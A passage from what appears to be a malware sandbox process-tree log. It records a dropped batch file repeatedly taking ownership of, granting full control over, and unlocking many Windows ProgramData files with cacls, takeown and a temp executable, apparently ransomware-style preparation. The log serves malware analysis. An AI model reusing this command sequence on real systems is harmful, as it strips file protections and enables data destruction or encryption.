    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win32.xml"
    3⤵
    PID:2560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
    3⤵
    PID:4968
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2013Office365Win32.xml" -nobanner
      4⤵
      PID:376
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml""
  2⤵
  PID:5020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml" /E /G Admin:F /C
    3⤵
    PID:2088
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin32.xml"
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
    3⤵
    PID:4892
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOutlook2016CAWin32.xml" -nobanner
      4⤵
      PID:2864
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  2⤵
  PID:296
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
    3⤵
    - Modifies file permissions
    PID:4360
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    3⤵
    PID:1616
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
      4⤵
      PID:4352
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4632
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl""
  2⤵
  PID:2116
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" /E /G Admin:F /C
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl"
    3⤵
    PID:4312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" -nobanner
    3⤵
    PID:4204
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MoUsoCoreWorker.65e2bc17-a539-4ced-896b-ebc3769d88f1.1.etl" -nobanner
      4⤵
      PID:5104
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl""
  2⤵
  PID:4532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" /E /G Admin:F /C
    3⤵
    PID:3444
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl"
    3⤵
    PID:4504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" -nobanner
    3⤵
    PID:4120
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" -nobanner
      4⤵
      PID:4488
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4696
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  PID:3676
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:4784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    - Modifies file permissions
    PID:1136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:4320
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:4636
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4472
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  PID:4680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    PID:880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2260
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3020
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4772
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml""
  2⤵
  PID:4980
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml" /E /G Admin:F /C
    3⤵
    PID:3772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml"
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftLync2010.xml" -nobanner
    3⤵
    PID:4848
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftLync2010.xml" -nobanner
      4⤵
      PID:4816
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4688
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml""
  2⤵
  PID:4988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml" /E /G Admin:F /C
    3⤵
    PID:4860
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Win32.xml"
    3⤵
    - Modifies file permissions
    PID:560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
    3⤵
    PID:4972
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2013Win32.xml" -nobanner
      4⤵
      PID:2976
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml""
  2⤵
  PID:652
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml" /E /G Admin:F /C
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftSkypeForBusiness2016Win32.xml"
    3⤵
    - Modifies file permissions
    PID:4712
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
    3⤵
    PID:4112
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftSkypeForBusiness2016Win32.xml" -nobanner
      4⤵
      PID:4924
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd""
  2⤵
  PID:4364
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd" /E /G Admin:F /C
    3⤵
    PID:2512
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate2013A.xsd"
    3⤵
    - Modifies file permissions
    PID:376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
    3⤵
    PID:4260
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "SettingsLocationTemplate2013A.xsd" -nobanner
      4⤵
      PID:2508
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl""
  2⤵
  PID:4552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" /E /G Admin:F /C
    3⤵
    PID:3528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl"
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" -nobanner
    3⤵
    PID:2556
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MoUsoCoreWorker.c361ea62-3714-4117-bd40-ae8dff18647b.1.etl" -nobanner
      4⤵
      PID:1516
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl""
  2⤵
  PID:4016
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" /E /G Admin:F /C
    3⤵
    PID:4500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl"
    3⤵
    - Modifies file permissions
    PID:4352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" -nobanner
    3⤵
    PID:4396
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "WuProvider.b0c355e6-65a5-4b2e-b901-5341ebba0138.1.etl" -nobanner
      4⤵
      PID:776
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4292
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""
  2⤵
  PID:4460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C
    3⤵
    PID:4432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"
    3⤵
    - Modifies file permissions
    PID:5104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "OfficeIntegrator.ps1" -nobanner
    3⤵
    PID:4756
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "OfficeIntegrator.ps1" -nobanner
      4⤵
      PID:4284
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:4228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:428
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "background.png" -nobanner
    3⤵
    PID:4672
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "background.png" -nobanner
      4⤵
      PID:3596
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4316
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:4144
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    PID:4636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4440
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:2452
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:4612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3484
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:5004
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""
  2⤵
  PID:4704
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"
    3⤵
    - Modifies file permissions
    PID:1872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
    3⤵
    PID:5076
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner
      4⤵
      PID:4896
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5028
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""
  2⤵
  PID:4768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C
    3⤵
    PID:4212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"
    3⤵
    PID:1220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
    3⤵
    PID:2848
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner
      4⤵
      PID:1628
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4836
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""
  2⤵
  PID:4728
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C
    3⤵
    PID:4140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"
    3⤵
    - Modifies file permissions
    PID:4236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
    3⤵
    PID:4944
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "RoamingCredentialSettings.xml" -nobanner
      4⤵
      PID:4152
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl""
  2⤵
  PID:4148
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" /E /G Admin:F /C
    3⤵
    PID:4424
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOShared\Logs\System\UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl"
    3⤵
    PID:4976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" -nobanner
    3⤵
    PID:4372
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "UpdateSessionOrchestration.a367b37d-652f-4d88-9b9d-e3a17dac8879.1.etl" -nobanner
      4⤵
      PID:4480
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3620
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  2⤵
  PID:4288
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    3⤵
    - Modifies file permissions
    PID:4520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:5100
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4100
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  2⤵
  PID:4552
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    3⤵
    PID:292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4232
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1716
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4428
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml""
  2⤵
  PID:4016
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml" /E /G Admin:F /C
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml"
    3⤵
    PID:4340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner
    3⤵
    PID:3144
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner
      4⤵
      PID:2580
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3080
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml""
  2⤵
  PID:4460
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml" /E /G Admin:F /C
    3⤵
    PID:3404
- - C:\Windows\SysWOW64\takeown.exe
